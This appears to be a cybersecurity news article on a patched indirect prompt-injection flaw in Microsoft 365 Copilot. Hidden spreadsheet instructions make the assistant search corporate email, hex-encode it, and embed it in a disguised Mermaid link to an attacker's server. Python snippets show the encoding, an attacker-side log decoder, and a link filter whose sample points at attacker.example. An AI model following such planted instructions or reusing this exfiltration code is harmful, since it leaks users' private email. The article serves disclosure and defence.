https://cybersecuritynews.com/copilot-prompt-injection-vulnerability-2
A vulnerability in Microsoft 365 Copilot (M365 Copilot) has been discovered that allows attackers to steal sensitive tenant data, including recent emails, through indirect prompt injection attacks. The flaw exploits the AI assistant’s integration with Office documents and its built-in support for Mermaid diagrams, enabling data exfiltration with minimal user interaction: the victim only has to request a summary and click a single link.
The attack begins when a user asks M365 Copilot to summarise a maliciously crafted Excel spreadsheet. Hidden instructions, embedded in white text across multiple sheets, use progressive task modification and nested commands to hijack the AI’s behaviour. These indirect prompts override the summarisation task, directing Copilot to invoke its search_enterprise_emails tool to retrieve recent corporate emails. The fetched content is then hex-encoded and fragmented into short lines to bypass Mermaid’s character limits.
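To make the encoding step concrete, here is a minimal sketch of the transformation the injected prompt instructs Copilot to perform: hex-encoding the retrieved email text and splitting it into short fragments so each piece stays within Mermaid’s per-line limits. The 30-character chunk size and the function name are assumptions for illustration, not details from the research.

```python
# Hypothetical sketch of the payload-preparation step described above:
# hex-encode the stolen text and split it into short fragments so each
# fits within Mermaid's per-line character limits.
def hex_fragments(text: str, chunk_size: int = 30) -> list[str]:
    encoded = text.encode("utf-8").hex()  # e.g. "Subject:" -> "5375626a6563743a"
    return [encoded[i:i + chunk_size]
            for i in range(0, len(encoded), chunk_size)]

if __name__ == "__main__":
    stolen = "Subject: Q3 financials\nFrom: cfo@example.com"
    for fragment in hex_fragments(stolen):
        print(fragment)
```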
Copilot then generates a Mermaid diagram disguised as a “login button”, complete with a lock emoji to suggest the content is protected. The diagram includes CSS styling for a convincing button appearance and a hyperlink carrying the encoded email data. When the user clicks the link, believing it is needed to unlock the document’s “sensitive” content, the request goes to the attacker’s server, where the hex-encoded payload can be recovered from the access logs.
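On the attacker’s side, recovering the emails then amounts to extracting the hex fragments from ordinary web-server access logs and decoding them. A minimal sketch follows; the query-parameter name `d`, the URL shape, and the combined log format are all assumptions for illustration:

```python
# Hypothetical decoder for the attacker's side: pull hex fragments out of
# access-log lines and reassemble the exfiltrated text.
import re
from urllib.parse import urlparse, parse_qs

def decode_from_logs(log_lines: list[str]) -> str:
    fragments = []
    for line in log_lines:
        match = re.search(r'"GET (\S+)', line)  # request path from a combined-format log
        if not match:
            continue
        params = parse_qs(urlparse(match.group(1)).query)
        fragments.extend(params.get("d", []))   # "d" is an assumed parameter name
    return bytes.fromhex("".join(fragments)).decode("utf-8", errors="replace")

if __name__ == "__main__":
    logs = [
        '10.0.0.5 - - [01/Sep/2025:12:00:00] "GET /login?d=5375626a6563743a HTTP/1.1" 200 -',
        '10.0.0.5 - - [01/Sep/2025:12:00:01] "GET /login?d=205133 HTTP/1.1" 200 -',
    ]
    print(decode_from_logs(logs))  # -> "Subject: Q3"
```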
Microsoft patched the vulnerability in September 2025, removing interactive hyperlinks from Copilot’s rendered Mermaid diagrams. The incident nonetheless highlights the risks of AI tool integrations, especially in enterprise environments that handle sensitive data. As LLMs like Copilot gain access to APIs and internal resources, defences against indirect prompt injection remain critical, and users are urged to verify document sources and monitor AI outputs closely.
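As one example of such output monitoring, a defender could scan Copilot-rendered Mermaid source for `click` directives that point at domains outside the tenant before the diagram reaches the user. This is a minimal sketch, assuming an allow-list approach; the domain list and regex are illustrative, not a vetted control:

```python
# Hypothetical output filter: flag Mermaid "click" directives whose link
# targets fall outside an allow-list of trusted domains.
import re
from urllib.parse import urlparse

ALLOWED_DOMAINS = {"contoso.sharepoint.com", "outlook.office.com"}  # assumed allow-list

def suspicious_links(mermaid_source: str) -> list[str]:
    links = re.findall(r'click\s+\w+\s+"(https?://[^"]+)"', mermaid_source)
    return [url for url in links
            if urlparse(url).hostname not in ALLOWED_DOMAINS]

if __name__ == "__main__":
    diagram = 'graph TD\n    A["🔒 Login"]\n    click A "https://attacker.example/login?d=53"'
    print(suspicious_links(diagram))  # -> ['https://attacker.example/login?d=53']
```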